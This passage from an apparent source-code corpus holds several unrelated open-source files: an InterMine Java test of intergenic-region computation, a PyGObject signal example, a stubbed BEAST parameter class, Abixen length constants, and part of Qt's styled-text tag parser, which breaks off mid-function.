QueryClass qc = new QueryClass(IntergenicRegion.class);
q.addFrom(qc);
q.addToSelect(qc);
SingletonResults res = os.executeSingleton(q);
Iterator resIter = res.iterator();
{
Set intergenicRegions = new HashSet(IteratorUtils.toList(resIter));
Iterator irIter = intergenicRegions.iterator();
Set actualIdentifiers = new HashSet();
while(irIter.hasNext()) {
IntergenicRegion ir = (IntergenicRegion) irIter.next();
assertNotNull(ir.getChromosome());
assertNotNull(ir.getOrganism());
assertNotNull(ir.getLength());
assertTrue(ir.getLength().intValue() > 0);
assertEquals(1, ir.getDataSets().size());
Location loc = ir.getChromosomeLocation();
assertNotNull(loc);
assertNotNull(loc.getStart());
assertNotNull(loc.getEnd());
assertNotNull(loc.getStrand());
assertEquals(1, loc.getDataSets().size());
int locStart = loc.getStart().intValue();
if (locStart > 0) {
Integer newLoc = new Integer(locStart - 1);
Collection prevGeneIds;
if (ir.getChromosome().getId().equals(chr1Id)) {
prevGeneIds = getByLoc(newLoc, chr1locMap);
} else {
prevGeneIds = getByLoc(newLoc, chrXlocMap);
}
Iterator prevGeneIdsIter = prevGeneIds.iterator();
while (prevGeneIdsIter.hasNext()) {
Gene prevGene = (Gene) os.getObjectById((Integer) prevGeneIdsIter.next());
assertTrue(prevGene.getUpstreamIntergenicRegion() != null
|| prevGene.getDownstreamIntergenicRegion() != null);
Set adjacentGenes = new HashSet(ir.getAdjacentGenes());
assertTrue(adjacentGenes.contains(prevGene));
if ("1".equals(loc.getStrand())) {
IntergenicRegion nextIntergenicRegion =
prevGene.getDownstreamIntergenicRegion();
Integer id = nextIntergenicRegion.getId();
assertEquals(id, ir.getId());
} else {
assertEquals(prevGene.getUpstreamIntergenicRegion().getId(), ir.getId());
}
}
}
int locEnd = loc.getEnd().intValue();
if (locEnd < ir.getChromosome().getLength().intValue()) {
Integer newLoc = new Integer(locEnd + 1);
Collection nextGeneIds;
if (ir.getChromosome().getId().equals(chr1Id)) {
nextGeneIds = getByLoc(newLoc, chr1locMap);
} else {
nextGeneIds = getByLoc(newLoc, chrXlocMap);
}
assertTrue(nextGeneIds.size() > 0);
Iterator nextGeneIdsIter = nextGeneIds.iterator();
while (nextGeneIdsIter.hasNext()) {
Gene nextGene = (Gene) os.getObjectById((Integer) nextGeneIdsIter.next());
if ("1".equals(loc.getStrand())) {
assertTrue(ir.getAdjacentGenes().contains(nextGene));
assertEquals(nextGene.getUpstreamIntergenicRegion().getId(), ir.getId());
} else {
assertTrue(ir.getAdjacentGenes().contains(nextGene));
assertEquals(nextGene.getDownstreamIntergenicRegion().getId(), ir.getId());
}
}
}
actualIdentifiers.add(ir.getPrimaryIdentifier());
}
Set expectedIdentifiers =
new HashSet(Arrays.asList(new Object[] {
"intergenic_region_chrX_1..100",
"intergenic_region_chrX_201..300",
"intergenic_region_chrX_401..500",
"intergenic_region_chrX_601..700",
"intergenic_region_chrX_951..1000",
"intergenic_region_chrI_101..300",
"intergenic_region_chrI_401..500",
"intergenic_region_chrI_901..1800",
}));
assertEquals(expectedIdentifiers, actualIdentifiers);
}
}
private Collection getByLoc(Integer newLoc, Map chrlocMap) {
Set chrGeneList = (Set) chrlocMap.get(newLoc);
if (chrGeneList == null) {
chrGeneList = new HashSet();
}
List retList = new ArrayList();
Iterator iter = chrGeneList.iterator();
while (iter.hasNext()) {
retList.add(((Gene) iter.next()).getId());
}
// return IDs that will be looked up in the on disk objectstore rather than using the
// Genes created by createChrX() and createChr1(), which have null IDs
return retList;
}
private Integer createChrX(List geneLocList, Map chrXlocMap, int idStart) throws ObjectStoreException {
Chromosome chr =
(Chromosome) DynamicUtil.createObject(Collections.singleton(Chromosome.class));
chr.setPrimaryIdentifier("X");
chr.setLength(new Integer(1000));
chr.setId(new Integer(101));
chr.setOrganism(organism);
Set toStore = new HashSet();
toStore.add(chr);
int [][] geneInfo = {
{ 0, 101, 200 },
{ 1, 301, 400 },
{ 2, 501, 600 },
{ 3, 701, 900 },
{ 4, 801, 950 },
};
Gene[] genes = new Gene[geneInfo.length];
Location[] geneLocs = new Location[geneInfo.length];
for (int i = 0; i < genes.length; i++) {
genes[i] = (Gene) DynamicUtil.createObject(Collections.singleton(Gene.class));
int geneId = geneInfo[i][0] + idStart;
int start = geneInfo[i][1];
int end = geneInfo[i][2];
genes[i].setId(new Integer(geneId));
genes[i].setLength(new Integer(end - start + 1));
genes[i].setChromosome(chr);
geneLocs[i] = createLocation(chr, genes[i], "1", start, end, Location.class);
geneLocs[i].setId(new Integer(100 + geneId));
genes[i].setChromosomeLocation(geneLocs[i]);
Util.addToSetMap(chrXlocMap, geneLocs[i].getStart(), genes[i]);
Util.addToSetMap(chrXlocMap, geneLocs[i].getEnd(), genes[i]);
}
toStore.addAll(Arrays.asList(genes));
geneLocList.addAll(Arrays.asList(geneLocs));
toStore.addAll(geneLocList);
Iterator iter = toStore.iterator();
while (iter.hasNext()) {
InterMineObject o = (InterMineObject) iter.next();
osw.store(o);
}
return chr.getId();
}
private Integer createChr1(List geneLocList, Map chr1locMap, int idStart) throws ObjectStoreException {
Chromosome chr =
(Chromosome) DynamicUtil.createObject(Collections.singleton(Chromosome.class));
chr.setPrimaryIdentifier("I");
chr.setLength(new Integer(2000));
chr.setId(new Integer(102));
chr.setOrganism(organism);
Set toStore = new HashSet();
toStore.add(chr);
int [][] geneInfo = {
// test special case - gene starts at first base of chromosome
{ 0, 1, 100 },
// test creating two genes with the same start and/or end base
{ 1, 301, 400 },
{ 2, 301, 400 },
{ 3, 501, 800 },
{ 4, 701, 900 },
// test special case - gene ends at last base of chromosome
{ 5, 1801, 2000 },
};
Gene[] genes = new Gene[geneInfo.length];
Location[] geneLocs = new Location[geneInfo.length];
for (int i = 0; i < genes.length; i++) {
genes[i] = (Gene) DynamicUtil.createObject(Collections.singleton(Gene.class));
int geneId = geneInfo[i][0] + idStart;
int start = geneInfo[i][1];
int end = geneInfo[i][2];
genes[i].setId(new Integer(geneId));
genes[i].setLength(new Integer(end - start + 1));
genes[i].setChromosome(chr);
geneLocs[i] = createLocation(chr, genes[i], "1", start, end, Location.class);
geneLocs[i].setId(new Integer(100 + geneId));
genes[i].setChromosomeLocation(geneLocs[i]);
Util.addToSetMap(chr1locMap, geneLocs[i].getStart(), genes[i]);
Util.addToSetMap(chr1locMap, geneLocs[i].getEnd(), genes[i]);
}
toStore.addAll(Arrays.asList(genes));
geneLocList.addAll(Arrays.asList(geneLocs));
toStore.addAll(geneLocList);
Iterator iter = toStore.iterator();
while (iter.hasNext()) {
InterMineObject o = (InterMineObject) iter.next();
osw.store(o);
}
return chr.getId();
}
private Location createLocation(BioEntity object, BioEntity subject, String strand,
int start, int end, Class<?> locationClass) {
Location loc = (Location) DynamicUtil.createObject(Collections.singleton(locationClass));
loc.setLocatedOn(object);
loc.setFeature(subject);
loc.setStrand(strand);
loc.setStart(new Integer(start));
loc.setEnd(new Integer(end));
return loc;
}
}
| JoeCarlson/intermine | bio/postprocess/test/src/org/intermine/bio/postprocess/IntergenicRegionsTest.java | Java | lgpl-2.1 | 14,309 |
from __future__ import print_function
from gi.repository import GObject
class C(GObject.GObject):
@GObject.Signal(arg_types=(int,))
def my_signal(self, arg):
"""Decorator style signal which uses the method name as signal name and
the method as the closure.
Note that with python3 annotations can be used for argument types as follows:
@GObject.Signal
def my_signal(self, arg:int):
pass
"""
print("C: class closure for `my_signal' called with argument", arg)
@GObject.Signal
def noarg_signal(self):
"""Decoration of a signal using all defaults and no arguments."""
print("C: class closure for `noarg_signal' called")
class D(C):
def do_my_signal(self, arg):
print("D: class closure for `my_signal' called. Chaining up to C")
C.my_signal(self, arg)
def my_signal_handler(obj, arg, *extra):
print("handler for `my_signal' called with argument", arg, "and extra args", extra)
inst = C()
inst2 = D()
inst.connect("my_signal", my_signal_handler, 1, 2, 3)
inst.connect("noarg_signal", my_signal_handler, 1, 2, 3)
inst.emit("my_signal", 42)
inst.emit("noarg_signal")
inst2.emit("my_signal", 42)
| GNOME/pygobject | examples/signal.py | Python | lgpl-2.1 | 1,236 |
/*
* FiniteSetParameter.java
*
* Copyright (c) 2002-2015 Alexei Drummond, Andrew Rambaut and Marc Suchard
*
* This file is part of BEAST.
* See the NOTICE file distributed with this work for additional
* information regarding copyright ownership and licensing.
*
* BEAST is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* BEAST is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with BEAST; if not, write to the
* Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
* Boston, MA 02110-1301 USA
*/
package dr.inference.model;
/**
* @author Marc A. Suchard
*/
public class FiniteSetParameter extends Parameter.Abstract implements VariableListener {
public void variableChangedEvent(Variable variable, int index, ChangeType type) {
//To change body of implemented methods use File | Settings | File Templates.
}
protected void storeValues() {
indicator.storeParameterValues();
}
protected void restoreValues() {
indicator.restoreParameterValues();
}
protected void acceptValues() {
//To change body of implemented methods use File | Settings | File Templates.
}
protected void adoptValues(Parameter source) {
//To change body of implemented methods use File | Settings | File Templates.
}
/**
* @param dim the index of the parameter dimension of interest
* @return the parameter's scalar value in the given dimension
*/
public double getParameterValue(int dim) {
return 0; //To change body of implemented methods use File | Settings | File Templates.
}
/**
* sets the scalar value in the given dimension of this parameter
*
* @param dim the index of the dimension to set
* @param value the value to set
*/
public void setParameterValue(int dim, double value) {
//To change body of implemented methods use File | Settings | File Templates.
}
/**
* sets the scalar value in the given dimensin of this parameter to val, without firing any events
*
* @param dim the index of the dimension to set
* @param value the value to set
*/
public void setParameterValueQuietly(int dim, double value) {
//To change body of implemented methods use File | Settings | File Templates.
}
/**
* sets the scalar value in the given dimensin of this parameter to val,
* and notifies that values in all dimension have been changed
*
* @param dim the index of the dimension to set
* @param value the value to set
*/
public void setParameterValueNotifyChangedAll(int dim, double value) {
//To change body of implemented methods use File | Settings | File Templates.
}
/**
* @return the name of this parameter
*/
public String getParameterName() {
return null; //To change body of implemented methods use File | Settings | File Templates.
}
/**
* Adds new bounds to this parameter
*
* @param bounds to add
*/
public void addBounds(Bounds<Double> bounds) {
//To change body of implemented methods use File | Settings | File Templates.
}
/**
* @return the intersection of all bounds added to this parameter
*/
public Bounds<Double> getBounds() {
return null; //To change body of implemented methods use File | Settings | File Templates.
}
/**
* Adds an extra dimension at the given index
*
* @param index Index of the dimension to add
* @param value value to save at end of new array
*/
public void addDimension(int index, double value) {
//To change body of implemented methods use File | Settings | File Templates.
}
/**
* Removes the specified dimension from parameter
*
* @param index Index of dimension to lose
* @return the value of the dimension removed
*/
public double removeDimension(int index) {
return 0; //To change body of implemented methods use File | Settings | File Templates.
}
private Parameter indicator;
}
| adamallo/beast-mcmc | src/dr/inference/model/FiniteSetParameter.java | Java | lgpl-2.1 | 4,575 |
/**
* Copyright (c) 2010-present Abixen Systems. All rights reserved.
*
* This library is free software; you can redistribute it and/or modify it under
* the terms of the GNU Lesser General Public License as published by the Free
* Software Foundation; either version 2.1 of the License, or (at your option)
* any later version.
*
* This library is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
* details.
*/
package com.abixen.platform.common.util;
public final class ModelKeys {
//FIXME - what is name?
public static final int NAME_MIN_LENGTH = 5;
public static final int NAME_MAX_LENGTH = 300;
public static final int USERNAME_MIN_LENGTH = 3;
public static final int USERNAME_MAX_LENGTH = 32;
public static final int PASSWORD_MAX_LENGTH = 60;
public static final int FIRSTNAME_MIN_LENGTH = 2;
public static final int FIRSTNAME_MAX_LENGTH = 64;
public static final int LASTNAME_MIN_LENGTH = 2;
public static final int LASTNAME_MAX_LENGTH = 64;
public static final int ROLE_NAME_MIN_LENGTH = 5;
public static final int ROLE_NAME_MAX_LENGTH = 20;
public static final int FILTER_NAME_MIN_LENGTH = 3;
public static final int FILTER_NAME_MAX_LENGTH = 100;
/**
* IPv4-mapped IPv6 (45 bytes)
*/
public static final int REGISTRATION_IP_MAX_LENGTH = 45;
public static final char COMMA = ',';
public static final char TAB = '\t';
}
| rbharath26/abixen-platform | abixen-platform-common/src/main/java/com/abixen/platform/common/util/ModelKeys.java | Java | lgpl-2.1 | 1,608 |
/****************************************************************************
**
** Copyright (C) 2013 Digia Plc and/or its subsidiary(-ies).
** Contact: http://www.qt-project.org/legal
**
** This file is part of the QtQuick module of the Qt Toolkit.
**
** $QT_BEGIN_LICENSE:LGPL$
** Commercial License Usage
** Licensees holding valid commercial Qt licenses may use this file in
** accordance with the commercial license agreement provided with the
** Software or, alternatively, in accordance with the terms contained in
** a written agreement between you and Digia. For licensing terms and
** conditions see http://qt.digia.com/licensing. For further information
** use the contact form at http://qt.digia.com/contact-us.
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
** In addition, as a special exception, Digia gives you certain additional
** rights. These rights are described in the Digia Qt LGPL Exception
** version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
**
** GNU General Public License Usage
** Alternatively, this file may be used under the terms of the GNU
** General Public License version 3.0 as published by the Free Software
** Foundation and appearing in the file LICENSE.GPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU General Public License version 3.0 requirements will be
** met: http://www.gnu.org/copyleft/gpl.html.
**
**
** $QT_END_LICENSE$
**
****************************************************************************/
#include <QStack>
#include <QVector>
#include <QPainter>
#include <QTextLayout>
#include <QDebug>
#include <qmath.h>
#include "qquickstyledtext_p.h"
#include <QQmlContext>
/*
QQuickStyledText supports few tags:
<b></b> - bold
<strong></strong> - bold
<i></i> - italic
<br> - new line
<p> - paragraph
<u> - underlined text
<font color="color_name" size="1-7"></font>
<h1> to <h6> - headers
<a href=""> - anchor
<ol type="">, <ul type=""> and <li> - ordered and unordered lists
<pre></pre> - preformated
<img src=""> - images
The opening and closing tags must be correctly nested.
*/
QT_BEGIN_NAMESPACE
Q_GUI_EXPORT int qt_defaultDpi();
class QQuickStyledTextPrivate
{
public:
enum ListType { Ordered, Unordered };
enum ListFormat { Bullet, Disc, Square, Decimal, LowerAlpha, UpperAlpha, LowerRoman, UpperRoman };
struct List {
int level;
ListType type;
ListFormat format;
};
QQuickStyledTextPrivate(const QString &t, QTextLayout &l,
QList<QQuickStyledTextImgTag*> &imgTags,
const QUrl &baseUrl,
QQmlContext *context,
bool preloadImages,
bool *fontSizeModified)
: text(t), layout(l), imgTags(&imgTags), baseFont(layout.font()), baseUrl(baseUrl), hasNewLine(false), nbImages(0), updateImagePositions(false)
, preFormat(false), prependSpace(false), hasSpace(true), preloadImages(preloadImages), fontSizeModified(fontSizeModified), context(context)
{
}
void parse();
void appendText(const QString &textIn, int start, int length, QString &textOut);
bool parseTag(const QChar *&ch, const QString &textIn, QString &textOut, QTextCharFormat &format);
bool parseCloseTag(const QChar *&ch, const QString &textIn, QString &textOut);
void parseEntity(const QChar *&ch, const QString &textIn, QString &textOut);
bool parseFontAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format);
bool parseOrderedListAttributes(const QChar *&ch, const QString &textIn);
bool parseUnorderedListAttributes(const QChar *&ch, const QString &textIn);
bool parseAnchorAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format);
void parseImageAttributes(const QChar *&ch, const QString &textIn, QString &textOut);
QPair<QStringRef,QStringRef> parseAttribute(const QChar *&ch, const QString &textIn);
QStringRef parseValue(const QChar *&ch, const QString &textIn);
void setFontSize(int size, QTextCharFormat &format);
inline void skipSpace(const QChar *&ch) {
while (ch->isSpace() && !ch->isNull())
++ch;
}
static QString toAlpha(int value, bool upper);
static QString toRoman(int value, bool upper);
QString text;
QTextLayout &layout;
QList<QQuickStyledTextImgTag*> *imgTags;
QFont baseFont;
QStack<List> listStack;
QUrl baseUrl;
bool hasNewLine;
int nbImages;
bool updateImagePositions;
bool preFormat;
bool prependSpace;
bool hasSpace;
bool preloadImages;
bool *fontSizeModified;
QQmlContext *context;
static const QChar lessThan;
static const QChar greaterThan;
static const QChar equals;
static const QChar singleQuote;
static const QChar doubleQuote;
static const QChar slash;
static const QChar ampersand;
static const QChar bullet;
static const QChar disc;
static const QChar square;
static const QChar lineFeed;
static const QChar space;
static const int tabsize = 6;
};
const QChar QQuickStyledTextPrivate::lessThan(QLatin1Char('<'));
const QChar QQuickStyledTextPrivate::greaterThan(QLatin1Char('>'));
const QChar QQuickStyledTextPrivate::equals(QLatin1Char('='));
const QChar QQuickStyledTextPrivate::singleQuote(QLatin1Char('\''));
const QChar QQuickStyledTextPrivate::doubleQuote(QLatin1Char('\"'));
const QChar QQuickStyledTextPrivate::slash(QLatin1Char('/'));
const QChar QQuickStyledTextPrivate::ampersand(QLatin1Char('&'));
const QChar QQuickStyledTextPrivate::bullet(0x2022);
const QChar QQuickStyledTextPrivate::disc(0x25e6);
const QChar QQuickStyledTextPrivate::square(0x25a1);
const QChar QQuickStyledTextPrivate::lineFeed(QLatin1Char('\n'));
const QChar QQuickStyledTextPrivate::space(QLatin1Char(' '));
QQuickStyledText::QQuickStyledText(const QString &string, QTextLayout &layout,
QList<QQuickStyledTextImgTag*> &imgTags,
const QUrl &baseUrl,
QQmlContext *context,
bool preloadImages,
bool *fontSizeModified)
: d(new QQuickStyledTextPrivate(string, layout, imgTags, baseUrl, context, preloadImages, fontSizeModified))
{
}
QQuickStyledText::~QQuickStyledText()
{
delete d;
}
void QQuickStyledText::parse(const QString &string, QTextLayout &layout,
QList<QQuickStyledTextImgTag*> &imgTags,
const QUrl &baseUrl,
QQmlContext *context,
bool preloadImages,
bool *fontSizeModified)
{
if (string.isEmpty())
return;
QQuickStyledText styledText(string, layout, imgTags, baseUrl, context, preloadImages, fontSizeModified);
styledText.d->parse();
}
void QQuickStyledTextPrivate::parse()
{
QList<QTextLayout::FormatRange> ranges;
QStack<QTextCharFormat> formatStack;
QString drawText;
drawText.reserve(text.count());
updateImagePositions = !imgTags->isEmpty();
int textStart = 0;
int textLength = 0;
int rangeStart = 0;
bool formatChanged = false;
const QChar *ch = text.constData();
while (!ch->isNull()) {
if (*ch == lessThan) {
if (textLength) {
appendText(text, textStart, textLength, drawText);
} else if (prependSpace) {
drawText.append(space);
prependSpace = false;
hasSpace = true;
}
if (rangeStart != drawText.length() && formatStack.count()) {
if (formatChanged) {
QTextLayout::FormatRange formatRange;
formatRange.format = formatStack.top();
formatRange.start = rangeStart;
formatRange.length = drawText.length() - rangeStart;
ranges.append(formatRange);
formatChanged = false;
} else if (ranges.count()) {
ranges.last().length += drawText.length() - rangeStart;
}
}
rangeStart = drawText.length();
++ch;
if (*ch == slash) {
++ch;
if (parseCloseTag(ch, text, drawText)) {
if (formatStack.count()) {
formatChanged = true;
formatStack.pop();
}
}
} else {
QTextCharFormat format;
if (formatStack.count())
format = formatStack.top();
if (parseTag(ch, text, drawText, format)) {
formatChanged = true;
formatStack.push(format);
}
}
textStart = ch - text.constData() + 1;
textLength = 0;
} else if (*ch == ampersand) {
++ch;
appendText(text, textStart, textLength, drawText);
parseEntity(ch, text, drawText);
textStart = ch - text.constData() + 1;
textLength = 0;
} else if (ch->isSpace()) {
if (textLength)
appendText(text, textStart, textLength, drawText);
if (!preFormat) {
prependSpace = !hasSpace;
for (const QChar *n = ch + 1; !n->isNull() && n->isSpace(); ++n)
ch = n;
hasNewLine = false;
} else if (*ch == lineFeed) {
drawText.append(QChar(QChar::LineSeparator));
hasNewLine = true;
} else {
drawText.append(QChar(QChar::Nbsp));
hasNewLine = false;
}
textStart = ch - text.constData() + 1;
textLength = 0;
} else {
++textLength;
}
if (!ch->isNull())
++ch;
}
if (textLength)
appendText(text, textStart, textLength, drawText);
if (rangeStart != drawText.length() && formatStack.count()) {
if (formatChanged) {
QTextLayout::FormatRange formatRange;
formatRange.format = formatStack.top();
formatRange.start = rangeStart;
formatRange.length = drawText.length() - rangeStart;
ranges.append(formatRange);
} else if (ranges.count()) {
ranges.last().length += drawText.length() - rangeStart;
}
}
layout.setText(drawText);
layout.setAdditionalFormats(ranges);
}
void QQuickStyledTextPrivate::appendText(const QString &textIn, int start, int length, QString &textOut)
{
if (prependSpace)
textOut.append(space);
textOut.append(QStringRef(&textIn, start, length));
prependSpace = false;
hasSpace = false;
hasNewLine = false;
}
//
// Calculates and sets the correct font size in points
// depending on the size multiplier and base font.
//
void QQuickStyledTextPrivate::setFontSize(int size, QTextCharFormat &format)
{
static const qreal scaling[] = { 0.7, 0.8, 1.0, 1.2, 1.5, 2.0, 2.4 };
if (baseFont.pointSizeF() != -1)
format.setFontPointSize(baseFont.pointSize() * scaling[size - 1]);
else
format.setFontPointSize(baseFont.pixelSize() * qreal(72.) / qreal(qt_defaultDpi()) * scaling[size - 1]);
*fontSizeModified = true;
}
bool QQuickStyledTextPrivate::parseTag(const QChar *&ch, const QString &textIn, QString &textOut, QTextCharFormat &format)
{
skipSpace(ch);
int tagStart = ch - textIn.constData();
int tagLength = 0;
while (!ch->isNull()) {
if (*ch == greaterThan) {
if (tagLength == 0)
return false;
QStringRef tag(&textIn, tagStart, tagLength);
const QChar char0 = tag.at(0);
if (char0 == QLatin1Char('b')) {
if (tagLength == 1) {
format.setFontWeight(QFont::Bold);
return true;
} else if (tagLength == 2 && tag.at(1) == QLatin1Char('r')) {
textOut.append(QChar(QChar::LineSeparator));
hasSpace = true;
prependSpace = false;
return false;
}
} else if (char0 == QLatin1Char('i')) {
if (tagLength == 1) {
format.setFontItalic(true);
return true;
}
} else if (char0 == QLatin1Char('p')) {
if (tagLength == 1) {
if (!hasNewLine)
textOut.append(QChar::LineSeparator);
hasSpace = true;
prependSpace = false;
} else if (tag == QLatin1String("pre")) {
preFormat = true;
if (!hasNewLine)
textOut.append(QChar::LineSeparator);
format.setFontFamily(QString::fromLatin1("Courier New,courier"));
format.setFontFixedPitch(true);
return true;
}
} else if (char0 == QLatin1Char('u')) {
if (tagLength == 1) {
format.setFontUnderline(true);
return true;
} else if (tag == QLatin1String("ul")) {
List listItem;
listItem.level = 0;
listItem.type = Unordered;
listItem.format = Bullet;
listStack.push(listItem);
}
} else if (char0 == QLatin1Char('h') && tagLength == 2) {
int level = tag.at(1).digitValue();
if (level >= 1 && level <= 6) {
if (!hasNewLine)
textOut.append(QChar::LineSeparator);
hasSpace = true;
prependSpace = false;
setFontSize(7 - level, format);
format.setFontWeight(QFont::Bold);
return true;
}
} else if (tag == QLatin1String("strong")) {
format.setFontWeight(QFont::Bold);
return true;
} else if (tag == QLatin1String("ol")) {
List listItem;
listItem.level = 0;
listItem.type = Ordered;
listItem.format = Decimal;
listStack.push(listItem);
} else if (tag == QLatin1String("li")) {
if (!hasNewLine)
textOut.append(QChar(QChar::LineSeparator));
if (!listStack.isEmpty()) {
int count = ++listStack.top().level;
for (int i = 0; i < listStack.size(); ++i)
textOut += QString(tabsize, QChar::Nbsp);
switch (listStack.top().format) {
case Decimal:
textOut += QString::number(count) % QLatin1Char('.');
break;
case LowerAlpha:
textOut += toAlpha(count, false) % QLatin1Char('.');
break;
case UpperAlpha:
textOut += toAlpha(count, true) % QLatin1Char('.');
break;
case LowerRoman:
textOut += toRoman(count, false) % QLatin1Char('.');
break;
case UpperRoman:
textOut += toRoman(count, true) % QLatin1Char('.');
break;
case Bullet:
textOut += bullet;
break;
case Disc:
textOut += disc;
break;
case Square:
textOut += square;
break;
}
textOut += QString(2, QChar::Nbsp);
}
}
return false;
} else if (ch->isSpace()) {
// may have params.
QStringRef tag(&textIn, tagStart, tagLength);
if (tag == QLatin1String("font"))
return parseFontAttributes(ch, textIn, format);
if (tag == QLatin1String("ol")) {
parseOrderedListAttributes(ch, textIn);
return false; // doesn't modify format
}
if (tag == QLatin1String("ul")) {
parseUnorderedListAttributes(ch, textIn);
return false; // doesn't modify format
}
if (tag == QLatin1String("a")) {
return parseAnchorAttributes(ch, textIn, format);
}
if (tag == QLatin1String("img")) {
parseImageAttributes(ch, textIn, textOut);
return false;
}
if (*ch == greaterThan || ch->isNull())
continue;
} else if (*ch != slash) {
tagLength++;
}
++ch;
}
return false;
}
bool QQuickStyledTextPrivate::parseCloseTag(const QChar *&ch, const QString &textIn, QString &textOut)
{
skipSpace(ch);
int tagStart = ch - textIn.constData();
int tagLength = 0;
while (!ch->isNull()) {
if (*ch == greaterThan) {
if (tagLength == 0)
return false;
QStringRef tag(&textIn, tagStart, tagLength);
const QChar char0 = tag.at(0);
hasNewLine = false;
if (char0 == QLatin1Char('b')) {
if (tagLength == 1)
return true;
else if (tag.at(1) == QLatin1Char('r') && tagLength == 2)
return false;
} else if (char0 == QLatin1Char('i')) {
if (tagLength == 1)
return true;
} else if (char0 == QLatin1Char('a')) {
if (tagLength == 1)
return true;
} else if (char0 == QLatin1Char('p')) {
if (tagLength == 1) {
textOut.append(QChar::LineSeparator);
hasNewLine = true;
hasSpace = true;
return false;
} else if (tag == QLatin1String("pre")) {
preFormat = false;
if (!hasNewLine)
textOut.append(QChar::LineSeparator);
hasNewLine = true;
hasSpace = true;
return true;
}
} else if (char0 == QLatin1Char('u')) {
if (tagLength == 1)
return true;
else if (tag == QLatin1String("ul")) {
if (!listStack.isEmpty()) {
listStack.pop();
if (!listStack.count())
textOut.append(QChar::LineSeparator);
}
return false;
}
} else if (char0 == QLatin1Char('h') && tagLength == 2) {
textOut.append(QChar::LineSeparator);
hasNewLine = true;
hasSpace = true;
return true;
} else if (tag == QLatin1String("font")) {
return true;
} else if (tag == QLatin1String("strong")) {
return true;
} else if (tag == QLatin1String("ol")) {
if (!listStack.isEmpty()) {
listStack.pop();
if (!listStack.count())
textOut.append(QChar::LineSeparator);
}
return false;
} else if (tag == QLatin1String("li")) {
return false;
}
return false;
} else if (!ch->isSpace()){
tagLength++;
}
++ch;
}
return false;
}
void QQuickStyledTextPrivate::parseEntity(const QChar *&ch, const QString &textIn, QString &textOut)
{
int entityStart = ch - textIn.constData();
int entityLength = 0;
while (!ch->isNull()) {
if (*ch == QLatin1Char(';')) {
QStringRef entity(&textIn, entityStart, entityLength);
if (entity == QLatin1String("gt"))
textOut += QChar(62);
else if (entity == QLatin1String("lt"))
textOut += QChar(60);
else if (entity == QLatin1String("amp"))
textOut += QChar(38);
else if (entity == QLatin1String("quot"))
textOut += QChar(34);
return;
}
++entityLength;
++ch;
}
}
bool QQuickStyledTextPrivate::parseFontAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format)
{
bool valid = false;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("color")) {
valid = true;
format.setForeground(QColor(attr.second.toString()));
} else if (attr.first == QLatin1String("size")) {
valid = true;
int size = attr.second.toString().toInt();
if (attr.second.at(0) == QLatin1Char('-') || attr.second.at(0) == QLatin1Char('+'))
size += 3;
if (size >= 1 && size <= 7)
setFontSize(size, format);
}
} while (!ch->isNull() && !attr.first.isEmpty());
return valid;
}
bool QQuickStyledTextPrivate::parseOrderedListAttributes(const QChar *&ch, const QString &textIn)
{
bool valid = false;
List listItem;
listItem.level = 0;
listItem.type = Ordered;
listItem.format = Decimal;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("type")) {
valid = true;
if (attr.second == QLatin1String("a"))
listItem.format = LowerAlpha;
else if (attr.second == QLatin1String("A"))
listItem.format = UpperAlpha;
else if (attr.second == QLatin1String("i"))
listItem.format = LowerRoman;
else if (attr.second == QLatin1String("I"))
listItem.format = UpperRoman;
}
} while (!ch->isNull() && !attr.first.isEmpty());
listStack.push(listItem);
return valid;
}
bool QQuickStyledTextPrivate::parseUnorderedListAttributes(const QChar *&ch, const QString &textIn)
{
bool valid = false;
List listItem;
listItem.level = 0;
listItem.type = Unordered;
listItem.format = Bullet;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("type")) {
valid = true;
if (attr.second == QLatin1String("disc"))
listItem.format = Disc;
else if (attr.second == QLatin1String("square"))
listItem.format = Square;
}
} while (!ch->isNull() && !attr.first.isEmpty());
listStack.push(listItem);
return valid;
}
bool QQuickStyledTextPrivate::parseAnchorAttributes(const QChar *&ch, const QString &textIn, QTextCharFormat &format)
{
bool valid = false;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("href")) {
format.setAnchorHref(attr.second.toString());
format.setAnchor(true);
format.setFontUnderline(true);
valid = true;
}
} while (!ch->isNull() && !attr.first.isEmpty());
return valid;
}
void QQuickStyledTextPrivate::parseImageAttributes(const QChar *&ch, const QString &textIn, QString &textOut)
{
qreal imgWidth = 0.0;
if (!updateImagePositions) {
QQuickStyledTextImgTag *image = new QQuickStyledTextImgTag;
image->position = textOut.length() + 1;
QPair<QStringRef,QStringRef> attr;
do {
attr = parseAttribute(ch, textIn);
if (attr.first == QLatin1String("src")) {
image->url = QUrl(attr.second.toString());
} else if (attr.first == QLatin1String("width")) {
image->size.setWidth(attr.second.toString().toInt());
} else if (attr.first == QLatin1String("height")) {
image->size.setHeight(attr.second.toString().toInt());
} else if (attr.first == QLatin1String("align")) {
if (attr.second.toString() == QLatin1String("top")) {
image->align = QQuickStyledTextImgTag::Top;
} else if (attr.second.toString() == QLatin1String("middle")) {
